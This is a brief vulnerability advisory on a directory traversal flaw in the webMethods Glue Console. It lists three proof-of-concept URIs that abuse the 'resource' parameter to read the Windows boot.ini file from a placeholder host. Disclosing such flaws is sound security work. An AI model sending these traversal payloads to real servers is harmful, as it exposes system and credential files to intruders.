webMethods Glue Console Directory Traversal Vulnerability

webMethods Glue Console Directory Traversal Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com:8080/console?resource=../../../boot.ini
http://www.example.com:8080/console?resource=\boot.ini
http://www.example.com:8080/console?resource=c:\boot.ini